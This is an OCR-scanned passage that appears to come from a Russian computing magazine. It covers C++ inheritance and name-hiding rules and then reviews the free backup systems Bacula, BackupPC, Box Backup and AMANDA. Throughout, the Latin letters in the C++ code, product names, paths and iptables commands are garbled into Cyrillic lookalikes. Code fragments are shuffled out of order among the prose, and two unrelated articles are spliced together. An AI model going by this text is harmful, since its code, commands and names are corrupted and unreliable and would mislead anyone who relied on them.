риЫіс : 

// ф-я ііу не объявлена 
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} ; 

сіазз РіуіпдВігсІ: риЫіс Вігб { 
риЫіс : 


Правило №2 

В этом правиле мы поговорим о наследовании и области видимости 
имен. Рассмотрим следующий пример: 


ѵігбиаі ѵоіб ііу ( ) ; 

} ; 

сіазз Репдиіп: риЫіс Вігсі { 


ОБЛАСТЬ ВИДИМОСТИ 

// глобальная переменная 
іпб х; 


// ф-я Иу не объявлена 

} ; 


ѵоіб зошеРипс ( ) 
{ 


Создавать отдельный класс для обозначения летающих птиц иногда не 
совсем целесообразно, да и, на мой взгляд, не очень красиво. 

Есть другая школа, иначе относящаяся кданной проблеме. Она пред- 
лагает переопределить для пингвинов функцию Иу() так, чтобы во время 


/ / локальная переменная 
боиЫе х; 
збб: : сіп » х; 

} 


исполнения она возвращала ошибку. 

Если не летаем — ошибка 

ѵоіб еггог(сопзб збб: :збгіпд& шзд) ; 

сіазз Репдиіп: риЫіс Вігб { 
ѵігбиаі ѵоіб ііу ( ) 

{ еггог ( "Попытка заставить пингвина летать!") ; } 

} ; 


Все мы знаем, что втаком коде имя х в предложении считывания от- 
носится клокальной, а не кглобальной переменной, потому что имена во 
вложенной области видимости скрывают имена из внешних областей. 
Когда компилятор встречает имя х внутри функции зотеЕипс, он смо- 
трит, определено ли что-то стаким именем в локальной области видимо- 
сти. Если да, то объемлющие области видимости не просматриваются. В 
данном примере имя хссылается на переменнуютипа боиЫе. 
Теперьдобавим ксокрытию имен наследование. Рассмотрим пример 
посложнее. 


Важно понимать, чтотутмы говорим: «Пингвины могутлетать, нос 
их стороны это было бы ошибкой». Разница заключается во времени 
обнаружения ошибки. В последнем примере ошибка будетвыявлена 
только во время исполнения кода, а не во время компиляции, а хороший 
интерфейс должен предотвращать компиляцию неверного кода. Сделать 
это можно так: 


Наследование и область видимости 

сіазз Вазе { 
ргіѵабе : 

іпб х; 
риЫіс : 

ѵігбиаі ѵоіб шіі ( ) = 0; 
ѵігбиаі ѵоіб шіі (іпб) ; 


Неверный код не компилируется 

сіазз Вігсі { 


ѵігбиаі ѵоіб ші2 ( ) ; 


риЫіс : 

// ф-я ііу не объявлена 


ѵоіб тіЗ ( ) ; 
ѵоіб тіЗ (боиЫе) ; 


}; 


} ; 


сіазз Репдиіп: риЫіс Вігб { 

// ф-я ііу не объявлена 

} ; 

Репдиіп р; 


сіазз Бегіѵесі: риЫіс Вазе { 
риЫіс : 

ѵігбиаі ѵоіб шіі ( ) 
ѵоіб тіЗ ( ) ; 
ѵоіб ті4 ( ) ; 


р.ііуО; //ошибка! 


} ; 


Здесь функция І1у() не объявлена в базовом классе, что делает ее вызов 
невозможным и в производном. Это даетнам гарантиютого, чтоспроек- 
тированные нами классы будут использованы правильно. 

Ситуации, подобные описанной выше (с птичками и пингвинами] встре- 
чаются достаточно часто, поэтому с открытым наследованием надо быть 


Бегіѵесі б; 
іпб х; 


внимательным. 

Отношение «является» — не единственное возможное между классами. 
Два других, достаточно распространенных отношения — это «содержит» 
и «реализован посредством», разговор о которых, возможно, пойдет в 
других статьях. Очень часто при проектировании на С++ весь проект идет 


б.шіі ( ) ; 

// правильно, вызывается Бегіѵеб: :шіі 
б.шіі (х) ; 

// ошибка! Бегіѵеб: :шіі скрывает Вазе: :шіі 


вкривь и вкось из-затого, что эти взаимосвязи моделируются отношени- 
ем «является». 


б.ші2 () 1 

// правильно, вызывается Вазе: :шб2 
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сІ.тіЗ () ; 

// правильно, вызывается Бегіѵесі: :шіЗ 
ЫтііЗ (х) ; // ошибка! Бегіѵеб: :тО скрывает 

Вазе: :тіЗ 



Как видно из этого кода, мы перегрузили функцию ітТЗ, что само по 
себе уже не совсем правильно, но чтобы лучше разобраться с видимо- 
стью имен, закроем на это глаза. Этот код своим поведением способен 
удивить любого впервые с ним столкнувшегося С++-программиста. 
Основанное на областях видимости правило сокрытия имен никуда не 
делось, поэтому все функции с именами тИ и ггТЗ в базовом классе 
окажутся скрыты одноименными функциями в производном классе. С 
точки зрения поиска имен, ВазезтИ и ВазесгтТЗ более не наследуются 
классом Оегіѵеб. Это касается даже тех случаев, когда функции в базовом 
и производном классах принимают параметры разных типов, независи- 
мо оттого, идетли речь о виртуальных или не виртуальных функциях. 
Обоснование подобного поведения втом, чтооно не даетнечаянноуна- 
следовать перегруженные функции из базового класса, расположенного 
много вы шев иерархии наследования. К сожалению, такое поведение 
нарушает основной принцип открытого наследования — отношение 
«является». Обойти этот недостаток можно использованием изіпд- 
объявления: 

Использование изіпд-объявлений 

сіазз Вазе { 
ргіѵабе : 

іпб х; 
риЫіс : 

ѵігбиаі ѵоісі тіі ( ) = 0; 
ѵігРиа! ѵоісі тіі (іпб) ; 



ѵігСиаі ѵоісі ті2 ( ) ; 



ѵоісі тіЗ ( ) ; 
ѵоісі тіЗ (сіоиЫе) ; 



} ; 



сіазз Бегіѵесі: риЫіс Вазе { 
риЫіс : 

// обеспечить видимость всех (открытых) имен 
// шіі и тіЗ из класса Вазе в классе Бегіѵесі 
изіпд Вазе: :шіі; 
изіпд Вазе: :шіЗ; 

ѵігбиаі ѵоісі тіі ( ) 
ѵоісі тіЗ ( ) ; 
ѵоісі ті4 ( ) ; 

} ; 

Бегіѵесі б; 
іпб х; 



б.шіі() ; // правильно, вызывается Бегіѵесі: :ші1 

б.гпіі (х) ; // теперь правильно, вызывается Вазе: :ші1 

б.ші2 () ; // правильно, вызывается Вазе: :ші2 



хочешь переопределить только некоторые из них, то придется включить 
изіпд-объявления для каждого имени, иначе оно будет сокрыто. 

Правило №3 

Внешне простая идея открытого наследования при ближайшем рассмо- 
трении оказывается состоящей из двух различных частей: наследование 
интерфейса и наследование реализации. Различие между этими двумя 
видами наследования соответствует различию между объявлениями и 
определениями функций. 

Иногда требуется, чтобы класс наследовал только интерфейс функции, 
иногда — интерфейс и реализацию, нотак, чтобы он впоследствии мог 
(или не мог, пожеланию] переопределить реализацию. Классический 
пример, который часто приводят во время изложения принципов ООП 
основывается на описании иерархии классов геометрических фигур. Мы 
не будем отклоняться от этой традиции. 

Иерархия классов 

сіазз ЗЬаре { 
риЫіс : 

ѵігРиаІ ѵоісі бгам ( ) сопзб = 0; 
ѵігбиаі ѵоісі еггог ( ) ; 
іпбоЬзесЫБО сопзб; 

} ; 



сіазз Кесбапдіе: риЫіс ЗЬаре {...}; 
сіазз ЕІІірзе: риЫіс ЗЬаре {...}; 

Как видно, в примере имеются все три вида функций: чисто виртуальные, 
виртуальные и не виртуальные. Начнем с чисто виртуальных. 
Какговорилось выше, открытое наследование подразумевает под собой 
отношение «является», которое означает, что интерфейсы абсолютно 
всех функций класса должны бытьунаследованы потомком. Чистая 
виртуальность как раз и обеспечиваеттот необходимый минимум, в соот- 
ветствии с которым потомокдолжен наследовать интерфейсы. 

В нашем примере чисто виртуальной является функция сі гаѵѵ(] обе- 
спечивающая отрисовку геометрических фигур. Оно и понятно, ведь 
алгоритмы рисования прямоугольника и эллипса сильно отличаются и 
невозможно написать единую функцию рисования для обеих этих фигур. 
Потомки Эбаре должны сами определить реализацию этого метода и 
чистая виртуальность функции бгаѵѵв родительском классе обязывает их 
это сделать. 

Учитывая, что чисто виртуальные функции должны быть заново объявле- 
ны в любом конкретном наследующем их классе, и в абстрактном классе 
они обычно не определяются, мы приходим кпониманию следующего 
обстоятельства: цель объявления чисто виртуальной функции состоит в 
том, чтобы производные классы наследовали только интерфейс. 

Теперь перейдем кпросто виртуальным функциям. В нашем примере 
это метод еггог(...], который выводит сообщение об ошибке. Простая 
виртуальность подразумевает под собой то, что производным классам 
не обязательно переопределять код наследуемой функции, а можно ис- 
пользовать реализацию поумолчанию. Получается что цель объявления 
обычной виртуальной функции — наследовать в производных классах 
как интерфейс, так и ее реализацию. 

Добавим еще один производный класс отЭЬаре в нашу иерархию. Пусть 
это будеттреугольник(ТгіапдІе). В отличие от прямоугольника и эллипса 
нас не устраивает базовая реализация обработки ошибоки мы должны 
переопределить ее в классе-потомке. Но по каким-то причинам мы за- 
бываем это сделать и используем реализацию поумолчанию, после чего 
начинаем получать странные сообщения об ошибках, которые мы совсем 
неждем. 



сі.шіЗ () ; // правильно, вызывается Бегіѵесі: :шіЗ 

сі.шіЗ (х) ; // теперь правильно, вызывается Вазе: :шіЗ 

Теперь наследование будет работать, как и ожидается. Это означает, что 
если ты наследуешь базовому классу с перегруженными функциями и 



Тгіапдіе 

сіазз ЗЬаре { 
риЫіс : 

ѵігРиа! ѵоісі еггог ( ) ; 
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} ; 

сіазз Тгіапдіе: риЫіс ЗЬаре { 

// должны были переопределить, но забыли 
ѵігбиаі ѵоіб еггог ( ) ; 

} ; 

Зйаре *бг = пеы Тгіапдіе; 

// вызывается Зйаре : : еггог ( ) , а нам этого не надо 
бг->еггог ( ) ; 

Чтобы такого не произошло, надо каким-то образом не дать классу 
треугольника использовать базовую реализацию функции, но вместе 
стем сохранить эту возможность для прямоугольника и эллипса. На 
помощь приходит парадигма разделения интерфейса и реализации. 
Сделать это можно, определив функцию еггог чисто виртуальной, а 
реализацию перенести в защищенную функцию-член. Выглядитэто 
примерно так: 



языка С++ многим неизвестна, да и в большинстве случаем она 
и не нужна, но в нашем примере такое определение оказалось 
кстати. 

Отделение реализации. Вариант 2 

сіазз Зйаре { 
риЫіс : 

ѵігбиаі ѵоіб еггог ( ) = 0; 

} ; 

// реализация чисто виртуальной функции 
ѵоіб Зйаре : : еггог ( ) 

{ 

// код по умолчанию, обрабатывающий ошибки 

} 

сіазз Кесбапдіе: риЫіс ЗЬаре { 
риЫіс : 

ѵігбиаі ѵоіб еггог ( ) { ЗЬаре : : еггог ( ) ; } 



Отделение реализации 

сіазз Зйаре { 
риЫіс : 

ѵігбиаі ѵоіб еггог ( ) ; 
ргобесбеб: 

ѵоіб беіаиЫЕггог ( ) ; 

} ; 

ѵоіб Зйаре: : беіаиІбЕггог ( ) 

{ 

// код по умолчанию, обрабатывающий ошибки 

} 



} ; 

сіазз ЕІІірзе: риЫіс Зйаре { 
риЫіс : 

ѵігбиаі ѵоісі еггог ( ) { ЗЬаре : : еггог ( ) ; } 

} ; 

сіазз Тгіапдіе: риЫіс ЗЬаре { 
риЫіс : 

ѵігбиаі ѵоіб еггог ( ) ; 

} ; 



сіазз Еесбапдіе: риЫіс ЗЬаре { 
риЫіс : 

ѵігбиаі ѵоіб еггог ( ) {беіаиЫЕггог ( ) ; } 

} ; 

сіазз ЕІІірзе: риЫіс ЗЬаре { 
риЫіс : 

ѵігбиаі ѵоіб еггог ( ) {беіаиЫЕггог ( ) ; } 

} ; 

сіазз Тгіапдіе: риЫіс ЗЬаре { 
риЫіс : 

ѵігбиаі ѵоіб еггог ( ) ; 

} ; 

ѵоіб Тгіапдіе : : еггог ( ) 

{ 

// код, обрабатывающий ошибки именно для класса 
Тгіапдіе 
} 

Теперь реализацией по умолчанию смогут воспользоваться только те 
классы, которым это на самом деле нужно, а наша забывчивость не при- 
ведет к вызову дефолтной версии функции. 

Однако, у этого подхода есть несколько недостатков, главный из 
которых — засорение пространства имен класса близкими назва- 
ниями функций. Решить эту проблему можно с помощью опреде- 
ления реализации чисто виртуальных функций. Эта особенность 



ѵоіб Тгіапдіе : : еггог ( ) 

{ 

// код, обрабатывающий ошибки именно для класса 
Тгіапдіе 
} 

Как видно, производные классы по-прежнему должны определять 
свою версию функции еггог, но для этого они могут воспользоваться 
ее реализацией в базовом классе. Сделав такой хитрый ход, мы 
решили проблему засорения пространства имен, однако, произво- 
дя слияние еггог и беіа и и Еггог, мы теряем возможность задать для 
этих функций разные уровни доступа. 

Последняя функция, которую мы рассмотрим — это невиртуальная функ- 
ция об]ес1:Ю(). Цель объявления невиртуальной функции заключается в 
том, чтобы заставить производные классы наследовать какее интер- 
фейс, таки обязательную реализацию. 

Каждый объектЭЬаре имеет функцию, которая дает идентификатор 
объекта, и задается определением функции 5Ьаре::оЬ]ес1:Ю, и никакой 
другой производный класс не должен его изменять. 

Разница в объявлении чисто виртуальных, виртуальных и невирутальных 
функциях позволяетто, что по замыслу программиста, должны наследо- 
вать производные классьптолько интерфейс, интерфейс и реализацию 
поумолчанию либо интерфейс и обязательную реализацию соответ- 
ственно. 

Заключение 

На этом мы завершим разговор отонкостях ООП в С++. Напомню, что, 
помимо рассмотренного, существуетеще много нюансов связанных с 
объектно-ориентированным программированием в С++, которые нужно 
знать, чтобы быть уверенным в своих силах, т 
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ОБЗОР КРОССПЛАТФОРМЕННЫХСИСТЕМ 
РЕЗЕРВНОГО КОПИРОВАНИЯ 



Выбор системы резервирования для гетерогенной сети — дело весьма 
непростое. Требований, предъявляемых к конечному варианту, можно 
выставить предостаточно: поддержка как можно большего количества 
ОС (и, в первую очередь, ѴѴіпсІоѵѵз), различные схемы бэкапа, шифрова- 
ние, удобство в настройках и многое другое. Среди бесплатных решений 
довольно много интересных систем, попробуем разобраться в их особен- 
ностях. 



ВАС1Л.А 

НАЗВАНИЕ: Васиіа 

САЙТ ПРОЕКТА: Ьаси1а.ог§, зі.пеі/рпуесіз/ 
Ьасиіа 

ДОСТУПНЫЕ ВЕРСИИ: свободная Васиіа 

Ргоіесі: 5.x и коммерческая Васиіа Зузіет 

Епіегргізе 4.x 

ЛИЦЕНЗИЯ: СШ СРЬ 

ОС СЕРВЕР: Ілпих, РгееВЗБ, Ореп/Зоіагіз 

ОС КЛИЕНТ: Ілпих, *В5Б, Ореп/Зоіагіз, Мае 

05 X, ѴѴіп 

Очень популярная кроссплатформенная 
система резервного копирования, архивиро- 
вания и восстановления данных. Построена 
по клиент-серверной технологии, модульная 
архитектура делает Васиіа достаточно гибким 
инструментом, позволяющим использовать 
его как на единичной системе, так и для резер- 
вирования данных в разветвленной корпора- 
тивной сети. Все настройки осуществляются 
путем правки конфигурационных файлов. 
Некоторое время придется потратить на их 
изучение, но зато полученные в итоге возмож- 
ности с лихвой окупят предварительный этап 
подготовки. Конфиг позволяет задавать прак- 
тически любые условия, вплоть до характера 
резервирования для различных типов файлов 
(например, архивы не сжимать, а просто копи- 
ровать) . Васиіа обладает большим количест- 
вом продвинутых возможностей, позволяю- 
щих с легкостью находить и восстанавливать 
утраченные или поврежденные файлы, в том 
числе и на другую систему. Поддерживаются 

► іі4 



все возможные стратегии резервирования — 
полное, инкрементное и дифференциальное. 
Сжатие файлов производится на клиентской 
стороне, что уменьшает трафик и разгружает 
сервер. Стоит отметить весьма удачный встро- 
енный планировщик и систему приоритета 
выполнения заданий. 

Система резервирования, построенная на 
Васиіа, состоит из трех основных компонен- 
тов, которые могут быть развернуты как на 
одном, так и на нескольких серверах/рабочих 
станциях: 

• Пігесіог (порт 9101) — основной элемент, 
осуществляющий централизованное управле- 
ние всеми составляющими Васиіа, формиро- 
вание и запуск заданий по расписанию, также 
ведет журнал событий; 

• Зіога^е (порт 9103) — демон, отвечающий 
за непосредственную запись резервируемых 
данных на носитель (жесткий диск, СП/ОѴБ, 
ленточный или ШВ накопитель) ; 

• Рііе Баетоп (порт 9102) — клиентская про- 
грамма, которая устанавливается на каждом 
компьютере и по команде Пігесіог'а произ- 
водит резервирование и передачу данных на 
Злотые. 

Кроме этого, для отслеживания процесса обме- 
на данными между Оігесі:, Згога^е, Рііе Паетоп 
и управления работой Васиіа администратор 
устанавливает на свой компьютер Мопішг 
(значок висит в трее) и консоль. 

Для хранения журналов архивных копий ис- 
пользуется база данных — Розг^геЗОЬ, МуЗС^Ь 



или 5(21лі:е. Сервер с ролью БігесШг и Зіога^е 
должен работать под управлением Ілпих, 
РгееВЗБ, Ореп/Зоіагіз. Список ОС, на которые 
можно установить клиента, пополнен ѴѴіпсІоѵѵз 
(32 и 64 Ъп), *В50, Мае 05 X. Именно такое раз- 
нообразие и привело к тому, что Васиіа очень 
популярна в гетерогенных сетях. Соединение 
между компонентами не защищено, но при 
необходимости легко настроить 55Н туннель, 
на сайте проекта есть подробное описание. 

В настоящее время доступно несколько вари- 
антов консоли управления. Кроме текстовой 
консоли Ьсопзоіе, проект предлагает графи- 
ческую утилиту ВАТ (Васиіа АбтіпТооІ) на Оі- 
библиотеках (в ІЛэипт в ипіѵегзе) и ѵѵх-сопзоіе 
на ѵѵхѴѴісІ^еіз. В отдельном архиве (Ъасиіа- 
§иі) идут: ЪѵѵеЪ (веб-интерфейс на Регі для 
выполнения базовых операций), ЪасиІа-ѵѵеЪ 
(веб-консоль, написанная на РНР), Ыта§ет§г 
(веб-инструмент для управления записанны- 
ми на СБ данными) . Кроме этого, доступен ряд 
сторонних разработок, например Васиіасопі 
(ЪасиІасопТзІ.пеі:) иѴѴеЪасиІа (ѴѴеЪ + Васиіа, 
уѵеЪасиІа.зІ.пеі/ги) . Так что из любой точки 
планеты, используя только веб-браузер, админ 
может запустить задание и просмотреть теку- 
щий статус (выполненные, с ошибками и т.д.), 
восстановить файлы, управлять хранилищами 
и многое другое. 

По умолчанию для аутентификации компонен- 
тов Васиіа используется пара логин и пароль 
(передается СКАМ-МОБ), но при необходимос- 
ти довольно просто настроить более защищен- 
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ную ТЬЗ аутентификацию. 

В общем случае правило ірііаЫез для сети 192.168.1.0/24 выглядит так: 
Для сервера: 

-А ШРОТ? -р Рср — сірогр 9101:9103 -з 192.168.1.0/24 -3 
АССЕРТ 

На клиентском компе нужно открыть только 9102 порт: 

-А ШРОТ 1 -р Рср --йрогР 9102 -з 192.168.1.0/24 Щ АССЕРТ 

Админы, не желающие возиться с установкой Васиіа, могут восполь- 
зоваться специализированным дистрибутивом Вгап (ЪгапЬаскир.огч. 
его основой послужил АЕГ Ііпих) , предназначенным для организации 
центра хранения информации. Для управления настройками предлага- 
ется простой и понятный веб-интерфейс. 

ВАСКЦРРС 

НАЗВАНИЕ: ВаскирРС 

САЙТ ПРОЕКТА: Ьаскиррс.зЕпеІ 

ЛИЦЕНЗИЯ: ОІШ СРЬ 

ОС СЕРВЕР: Ыпих, *В8Б, Ореп/8о1агіз 

ОС КЛИЕНТ: не требует 

ВаскирРС — еще одно популярное решение для резервирования и вос- 
становления данных в гетерогенных сетях. В отличие от Васиіа, не тре- 
бует установки клиентского ПО, поэтому достаточно прост и понятен в 
настройке и поддержке. Ведь все установки производятся практически 
в одном месте, настройки на клиентской стороне минимальны. Сер- 
верная часть может работать на сервере под управлением практически 
любой Шіх-подобной ОС — Ыпих, *ВЗБ, Ореп/Зоіагіз. Для резервиро- 
вания данных с клиентских машин под управлением Шіх/Ііпих, Мае 
08 X и ѴѴіпсІоѵѵз используются «родные» протоколы. Так для подключе- 
ния к сетевым папкам ѴѴіпсІоѵѵз применяется 8МВ, хотя предусмотрена 



работа и с использованием гзупс (через су§злчп), для Шіх-подобных 
систем выбор шире — гзупс, піз или таг. 

ВаскирРС является универсальным средством, поскольку можно 
определить вариант создания резервной копии для любой ситуации: в 
локальной сети можно отдать предпочтение 8МВ, менее нагружающе- 
му клиентскую систему, но требующему более широкого канала, а для 
удаленных систем, разбросанных по филиалам и работающих через 
медленные каналы — гзупс. Компрессия данных производится на сер- 
вере (§ 2 Ір/Ьгір 2 ), администратор может задавать различный уровень 
сжатия. Данные сервер сохраняет на жестком диске, ленточном накопи- 
теле или сетевом ресурсе. При необходимости передачи информации 
по незащищенным сетям легко настроить 38Н туннель. 

Следует также отметить поддержку резервирования систем, подклю- 
чающихся к сети периодически и не имеющих постоянного ІР-адреса. 
Резервирование для них можно настроить как персонально, так и ука- 
зать параметры, зависящие от операционной системы клиента. Можно 
определить различные задачи для полных и инкрементных копий. Если 
информация с компьютера некоторое время не резервировалась, то 
пользователю будет отправлено предупреждение посредством элект- 
ронной почты. Для систем, подключающихся к сети периодически и с 
разных ІР, также возможно предусмотреть специфические настройки 
резервирования. 

В ВаскирРС есть еще одна фишка, которая позволяет экономить место 
на харде. Если при копировании обнаружится несколько копий одного 
файла, то такой файл загружается только один раз. А для привязки к 
резервируемой системе создается жесткая ссылка. Если файл изме- 
нится, то он будет резервирован уже стандартным способом. Файл при 
необходимости можно восстановить на любой компьютер. Также сле- 
дует отметить возможность работы с архивами, созданными системой 
бэкапа АМАЫБА. 

Основные настройки производятся путем правки сопіі^.рі (файл 
хорошо документирован, в поставке есть готовый шаблон) . Общие 
параметры могут быть переопределены в индивидуальных файлах 
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Веб-консоль управления ВасиІа-ѴѴеЬасиІа 



настройки (размещаются в /ЗегѵегВаскирРС/ 
рс/сотриі:ег_пате) . Список «подлежащих 
архивированию» компьютеров заносится в 
файлЬозщ. 

Для изменения конфигурации сервера, добав- 
ления и удаления узлов, просмотра текущего 
состояния процесса создания резервных ко- 
пий, инициализации и приостановки заданий, 
поиска и восстановления данных использу- 
ется удобный веб-интерфейс (ССІ), поэтому 
придется поднимать еще и веб-сервер. Хотя 
проблем здесь обычно не возникает, поскольку 
при установке практически любого дистри- 
бутива из репозитария все необходимое будет 
сделано автоматически. Веб-интерфейс не 
локализован, но понятен даже неспециалисту. 
Написан ВаскирРС на Регі, для работы 
потребуется ряд дополнительных модулей: 
Сотргезз : : 2НЪ, АгсЫѵе : : 2ір и Рііе : : КзупсР. 
Кроме этого, понадобятся серверы 5атЪа и 
АрасЬе. 

Текущей стабильной является версия 3.1.0 
(ноябрь 2007 года), хотя на сайте проекта име- 
ется уже 3.2.0Ъеі:а0 (апрель 2009), работающая 
стабильно и без нареканий. 

ВОХВАСКЦР 

НАЗВАНИЕ: ВохВаскир 
САЙТ ПРОЕКТА: ЬохЬаскир.ог§ 



ЛИЦЕНЗИЯ: В5Б 

ОС СЕРВЕР: Ііпих, * В5Б, Ореп/5о1агІ8, Мае 
05 X 

ОС КЛИЕНТ: Ііпих, *В5Б, Ореп/5о1агІ8, Мае 
05 X, \ѴіпХР/2кЗ/ѴІ8І:а 

Разработчики системы резервирования Вох 
Васкир считают, что нужные данные должны 
быть всегда под рукой. Учитывая, что цены на 
терабайтные жесткие диски уже не кусаются, 
в некоторых случаях вполне можно обойтись 
и без стримера, кассет, СБ/ОѴБ и так далее. 
Достаточно сервера с несколькими жесткими 
дисками. В итоге не нужно беспокоиться о 
безопасном хранении кассет, а нужный файл 
восстанавливается буквально одним щелчком 
мышки. Резервная копия создается, как только 
будет обнаружено изменение исходного фай- 
ла. При первом запуске программы создается 
полная копия данных (зпарзЬоі:), затем для 
уменьшения трафика по сети передаются 
только изменения (гзупс) . 

Интересно, что в Вох Васкир имитируется ра- 
бота с лентами, в архиве доступны как старые, 
так и новые версии файла. Если пользователь 
удалил данные на своем компьютере, в резер- 
вной копии они по-прежнему остаются (пока 
есть место на диске) и лишь помечаются как 
удаленные. Таким образом, Вох Васкир являет- 
ся еще и дополнительной Корзиной для особо 



Архивирование 
Ѵ8 Резервирование 

Специалисты различают термины архивирование и резервирование, хотя на 
первый взгляд они могут показаться одинаковыми. На самом деле резервирова- 
ние — это создание копии данных с целью повышения избыточности. В случае 
потери оригинального файла его можно восстановить из резервной копии. По 
мере обновления файлов должны обновляться и резервные копии. Операция 
архивирования отличается тем, что вместо копии в архив помещается сам файл, 
например, он стал не нужен (отчет за прошлый год). При необходимости работы с 
такими данными файл возвращается из архива. 




Графический клиент Вохі 

важных файлов. Пользователь при необходи- 
мости может самостоятельно вернуть файл к 
жизни, если обнаружит пропажу. 

Правила позволяют тонко настроить процесс 
резервирования, исключив отдельные под- 
каталоги или типы файлов. Например, чтобы 
в архив не попали музыкальные МРЗ файлы, 
пишем: 

ЕхсІибеРіІезКедех = . * \ . (шрЗ I МРЗ ) $ 

Построен Вох Васкир по ставшей уже при- 
вычной клиент-серверной схеме и состоит из 
трех элементов: сервера ЬЬзШгесі, осущест- 
вляющего хранение информации, клиента 
ЪЪаскирб, контролирующего изменения и при 
обнаружении таковых загружающего новые 
данные на сервер, и утилиты ЪЪаскир^ие^у, 
предназначенной для управления созданием 
резервных копий и восстановления инфор- 
мации. То, что резервированием фактически 
управляет клиент, достаточно удобно, ведь 
таким образом можно легко бэкапить данные 
с ноутов мобильных сотрудников, как только 
они подключатся к корпоративной сети. 

В качестве серверной части рекомендуются 
ОреиВЗБ и Ііпих, но Вох Васкир будет работать 
на Ргее/НегВЗБ, Мае 05 X, 5о1агі$. Клиентская 
часть, кроме перечисленного, может быть 
установлена и на ѴѴіпбоѵѵз. 

Безопасности в Вох Васкир уделено особое 
внимание. Так аутентификация и передача 
данных производятся по защищенному ТБ5/ 
55Б каналу. После установки сервера гене- 
рируется сертификат, в комплекте постав- 
ляется специальный скрипт ЪЪзШгесІ-сегЩ, 
облегчающий процедуру его создания. Сами 
данные шифруются на клиенте при помощи 
алгоритма АЕ5, метаданные — ВІоѵ\ТІ5Іі, это 
гарантирует, что на сервере не будет откры- 
той информации, которую легко украсть. Не 
зная ключа, прочитать файлы (они хранятся 
под номерами, а не именами) невозможно. 
Кроме этого, шифрование на стороне клиента 
уменьшает нагрузку на сервер, процесс имеет 
невысокий приоритет, поэтому работа систе- 
мы резервирования почти незаметна. 

По умолчанию все настройки как на сервере, 
так и клиенте производятся в командной 
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Веб-интерфейсуправления ВаскирРС 



строке и при помощи конфигурационного файла. От- 
дельно доступен графический клиент Вохі (ЪохкзГпеГ) , 
собранный с использованием кроссплатформенной 
библиотеки ѵѵхѴѴіс^еіз. С его помощью довольно просто 
настроить опции копирования и восстановления файлов. 
Также в комплекте идет скомпилированный клиент для 
ѴѴіпсІоѵѵз. Сторонними разработчиками написан веб-кли- 
ент ВохЪаскир-ЕхрІогег (іоопіз.сІе/ЪохЪаскир-ехрІогег) , 
который позволяет восстановить файлы и просмотреть 
статистику по наличию свободного места и использован- 
ным лимитам. 

Последней стабильной версией является 0.10 (февраль 
2006 года), которой и рекомендуют пользоваться разработ- 
чики. Но в ней есть проблема: при создании резервной ко- 
пии размером больше 2 Гб появляется ошибка. Если же для 
твоей сети это ограничение критично, можно воспользо- 
ваться нестабильной версией О.ІІгсБ (сентябрь 2009), хотя 
разработчики предупреждают о том, что в ней реализован 
еще не весь функционал. 

АМА№А 

НАЗВАНИЕ: АМАША 

САЙТ ПРОЕКТА: атапс1а.ог§, зГпеГ/рп^есГз /атапсіа 
ЛИЦЕНЗИЯ: Ргееѵѵаге 

ОС СЕРВЕР: Ілпих, *В5Б, Ореп/5о1агІ8, Мае 05 X 
ОС КЛИЕНТ: Ілпих, * В5Б, Ореп/5о1агІ8, Мае 05 X, 
ѴѴіпХР5Р2/2к35Р2/ѴІ8І:а5Р1/2к8К2/7 

АМАША (Абѵапсесі Магуіапб АиІотаІіс ИеПѵогк Эізк 
АгсЬіѵег) — развитая система архивирования, созданная и 
первоначально поддерживаемая университетом Магуіапб 
(США) . Со временем исходные тексты были перемещены 
на 5оигсе1ог§е, и сегодня проект разрабатывается сооб- 
ществом добровольцев и распространяется под Ігееѵѵаге 
лицензией, разрешающей его модифицировать, копиро- 
вать, распространять и продавать при условии сохранения 
авторства. 

Раньше АМАНБА пользовалась популярностью лишь у 
админов, обслуживающих *піх-сервера в больших сетях. 
Дело в том, что по сути АМАИОА является надстройкой к 
стандартным битр/гезгоге (дляХЕ5 хізсіитр), СЬЮ гаг, 
сотргезз, §гір и так далее, и изначально ориентирована 
на архивирование данных на стримеры. Но постепенно 
АМАЫПА научили сохранять данные на жесткий диск, СВ/ 
ЭУЭ и МО-диски. И теперь для этого уже не нужны лишние 
телодвижения, хотя первоначальная адаптация под стри- 
мер дает о себе знать, например жесткий диск нарезается 
на виртуальные кассеты. Возможности по созданию архива 
АМАЫПА определяются потенциалом бшпр и Гаг. Для 
ехі2/3, 2Е5 и ХЕ5 можно снять снапшот целого раздела, 
причем без его предварительного размонтирования, для 



— | Настраивается пакет Ьаскиррс 
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НЬісЬ неЪ 5вгиег ийиЫ уйи Икс іо гесопПдиге аиійлаі іей 1 Іу ’ 



[ ] арасіш 
[ ] арасііе-ззі 
[ 1 арасНе-рег 1 
[ I арасІзв2 





> ІПІО 

О Ѵ55 ч ита й в статье 
«Движение втени», 
опубликованной в ][ 
03 . 2008 . 



НТТР://ѴѴѴѴѴѴ 



ВаскирРС поддерживает любой ѴѴеЬ-сервер с включенным 
С6І, но мастер автоматической настройки знает только об 
индейце 



архивирования данных на остальных ФС следует исполь- 
зовать уже Гаг, который снапшоты снимать не умеет, зато в 
этом случае есть возможность отбора файлов и каталогов 
по шаблону. 

Построена АМАЫБА по клиент-серверной схеме. В 
зависимости от конфигурации сети и использования ОС, 
клиент устанавливается на удаленных системах, данные 
которых требуется архивировать, либо на самом сервере. 
Например, резервирование файлов ОС ѴѴіпсІоѵѵз изначаль- 
но поддерживалось по 5МВ. Сегодня доступна отдельная 
специальная версия — 2тап<іа ѴѴіпсІоѵѵз СНепГ 2.6.x ( ѵѵікі. 
2тапсіа.сот/іпс1ех.рЬр/2тапс1а ѴѴіпсІоѵѵз СНепО . под- 
держивающая ѴѴіп32 АРІ и использующая возможности 
Ѵоіите ЗЬасІоѵѵ 5егѵісез для создания резервных копий 
(подробнее о Ѵ55 читай в мартовском номере ] [ за 2008 
год) . Этот клиент будет работать на всех популярных 
версиях окон: ѴѴіпХР5Р2/2к35Р2/Ѵізі:а5Р1/2к8К2 и 5е7еп. 
Усилиями сторонних разработчиков доступен веб-интер- 
фейс (сз.ац.ас.гЬЛаЪогасогу /атапсіа ) . который поможет 
пользователям ѴѴіпсІоѵѵз зарегистрировать их системы для 
бэкапа на сервере. 

Для передачи информации между сервером и клиентом 
используется собственный протокол, работающий поверх 
ІЮР или ТСР. При настройке администратор может 
выбрать один из нескольких способов аутентификации: 
КегЬегоз 4/5, Ореп55Н, гзЬ, Ъзскср, Ъзсккір и 5атЪа. Но нуж- 
но учитывать, что ѴѴіпсІоѵѵз клиент поддерживает только 
Ъзсііср. Для его использования сервер следует запустить с 
аргументом "-аигЬ^Ьзбгср". Например, для іпегсі: 

